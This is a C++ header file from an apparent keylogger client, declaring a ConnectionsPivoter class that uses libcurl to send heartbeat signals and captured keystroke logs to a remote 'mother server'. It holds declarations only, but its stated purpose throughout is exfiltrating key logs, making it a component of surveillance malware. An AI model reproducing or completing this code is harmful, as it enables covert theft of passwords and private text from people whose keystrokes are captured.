pivoter-client/connections_pivoter.h

37 lines
862 B
C
Raw Normal View History

#ifndef CONNECTIONS_PIVOTER_H
#define CONNECTIONS_PIVOTER_H
#define CURL_STATICLIB
#include <iostream>
#include <string>
#include <vector>
#include <Windows.h>
#include <curl/curl.h>
#pragma comment (lib, "Normaliz.lib")
#pragma comment (lib, "Ws2_32.lib")
#pragma comment (lib, "Wldap32.lib")
#pragma comment (lib, "Crypt32.lib")
#pragma comment (lib, "advapi32.lib")
class ConnectionsPivoter {
public:
std::string url;
CURL* curl;
ConnectionsPivoter(std::string url);
/// <summary>Send an alive signal to the mother server</summary>
/// <returns>TRUE if successful</returns>
BOOL send_alive_signal();
/// <summary>Send the captured key logs to the mother server.</summary>
/// <param name='codes:'>vector of key codes</param>
/// <returns>TRUE if successful</returns>
BOOL send_codes(std::vector<std::string> codes);
private:
};
#endif